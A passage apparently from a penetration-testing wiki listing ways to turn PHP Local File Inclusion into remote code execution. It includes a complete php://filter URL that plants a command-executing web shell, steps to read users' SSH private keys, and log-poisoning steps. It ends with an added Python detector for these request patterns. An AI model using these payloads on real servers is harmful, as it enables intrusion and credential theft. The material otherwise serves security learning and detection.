### **Via** ssh

If ssh is active check which user is being used (`/proc/self/status` & `/etc/passwd`) and try to access **`<HOME>/.ssh/id_rsa`**.

### **Via** **vsftpd** _**logs**_

The logs of the FTP server vsftpd are located at _/var/log/vsftpd.log_. In the scenario where a Local File Inclusion (LFI) vulnerability exists and access to an exposed vsftpd server is possible, the following steps can be considered:

1. Inject a PHP payload into the username field during the login process.
2. After the injection, use the LFI to retrieve the server logs from _/var/log/vsftpd.log_.

### **Via** **php base64 filter (using base64)**

As shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP's base64 filter just ignores non-base64 characters. You can use that to bypass a file extension check: if you supply base64 that ends with "`.php`", it will ignore the "`.`" and decode "php" as a few extra bytes appended to the payload. Here is an example payload:
```
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the base64 decodes to "<?php system($_GET['cmd']);echo 'Shell done !'; ?>>" followed by the bytes decoded from the trailing "php", which land outside the PHP tags
```

### Via php filters (no file needed)

This [**writeup**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.

{% content-ref url="lfi2rce-via-php-filters.md" %}
[lfi2rce-via-php-filters.md](lfi2rce-via-php-filters.md)
{% endcontent-ref %}

### Via segmentation fault

**Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request** trigger a **segmentation fault**; the **temporary file won't be deleted** and you can search for it.

{% content-ref url="lfi2rce-via-segmentation-fault.md" %}
[lfi2rce-via-segmentation-fault.md](lfi2rce-via-segmentation-fault.md)
{% endcontent-ref %}

### Via Nginx temp file storage

If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:

{% content-ref url="lfi2rce-via-nginx-temp-files.md" %}
[lfi2rce-via-nginx-temp-files.md](lfi2rce-via-nginx-temp-files.md)
{% endcontent-ref %}

### Via PHP\_SESSION\_UPLOAD\_PROGRESS

If you found a **Local File Inclusion** but you **don't have a session** and `session.auto_start` is `Off`: if you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** field in **multipart POST** data, PHP will **enable the session for you** and write the upload progress (including attacker-controlled values) into the session file. You could abuse this to get RCE:

{% content-ref url="via-php_session_upload_progress.md" %}
[via-php\_session\_upload\_progress.md](via-php\_session\_upload\_progress.md)
{% endcontent-ref %}

### Via temp file uploads in Windows

If you found a **Local File Inclusion** and the server is running on **Windows** you might get RCE:

{% content-ref url="lfi2rce-via-temp-file-uploads.md" %}
[lfi2rce-via-temp-file-uploads.md](lfi2rce-via-temp-file-uploads.md)
{% endcontent-ref %}

### Via phpinfo() (file\_uploads = on)

If you found a **Local File Inclusion** and a file exposing **phpinfo()** with **file\_uploads = on** you can get RCE:

{% content-ref url="lfi2rce-via-phpinfo.md" %}
[lfi2rce-via-phpinfo.md](lfi2rce-via-phpinfo.md)
{% endcontent-ref %}

### Via compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure

If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**:

{% content-ref url="lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md" %}
[lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md](lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
{% endcontent-ref %}

### Via eternal waiting + bruteforce

If you can abuse the **LFI to upload temporary files** and make the server **hang** the PHP execution, you could then **brute force filenames during hours** to find the temporary file:

{% content-ref url="lfi2rce-via-eternal-waiting.md" %}
[lfi2rce-via-eternal-waiting.md](lfi2rce-via-eternal-waiting.md)
{% endcontent-ref %}

### To Fatal Error

If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (The error is thrown when the same file is included a second time.)

**I don't know how this is useful, but it might be.**\
_Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._

<figure><img src="../../.gitbook/assets/image (1) (5).png" alt=""><figcaption></figcaption></figure>
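As an added, defender-side example (not part of the original page or of HackTricks), the following Python checks constructed request records for the markers the techniques above rely on: `php://filter` conversion chains, `/usr/bin/phar` inclusion attempts, path traversal, and PHP tags inside a `PHP_SESSION_UPLOAD_PROGRESS` multipart field. The sample requests, the rule names and the `(uri, body)` record shape are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request records (not taken from the page): (request_uri, request_body).
# The body only matters for multipart POSTs, where the session-upload-progress field lives.
SAMPLE_REQUESTS = [
    ("/index.php?page=about", ""),
    ("/index.php?page=php://filter/convert.iconv.UTF8.UTF16|convert.base64-decode/resource=index", ""),
    ("/index.php?page=..%2F..%2F..%2Fusr%2Fbin%2Fphar", ""),
    ("/index.php", 'Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\r\n\r\n<?php echo 1; ?>'),
    ("/index.php", 'Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\r\n\r\nprogress-1'),
]

# php://filter followed by its stages up to the next "/" (where "resource=" starts).
PHP_FILTER = re.compile(r"php://filter/([^/]*)", re.I)
# Value of a multipart field named PHP_SESSION_UPLOAD_PROGRESS (headers, blank line, value).
UPLOAD_PROGRESS_FIELD = re.compile(r'name="PHP_SESSION_UPLOAD_PROGRESS"\r?\n\r?\n(.*)', re.S)
PHP_OPEN_TAG = re.compile(r"<\?(?:php|=)", re.I)

def classify(uri, body):
    """Return the list of rule names that match one request record."""
    findings = []
    # Decode twice so double-encoded sequences such as %252e%252e are also seen.
    path = unquote(unquote(uri))
    m = PHP_FILTER.search(path)
    if m and m.group(1).lower().count("convert.") >= 2:
        # Two or more convert.* stages: the filter-chain trick that generates content.
        findings.append("php_filter_chain")
    if "../" in path or "..\\" in path:
        findings.append("path_traversal")
    if "/usr/bin/phar" in path:
        findings.append("phar_binary_include")
    f = UPLOAD_PROGRESS_FIELD.search(body)
    # Upload progress bars legitimately send this field, so only PHP tags in its value count.
    if f and PHP_OPEN_TAG.search(f.group(1)):
        findings.append("session_upload_progress_php_tag")
    return findings

def scan(records):
    """Return (index, findings) for every record that triggers at least one rule."""
    hits = []
    for i, (uri, body) in enumerate(records):
        found = classify(uri, body)
        if found:
            hits.append((i, found))
    return hits
```

Running `scan(SAMPLE_REQUESTS)` flags records 1, 2 and 3 and leaves the benign page request and the plain progress value alone.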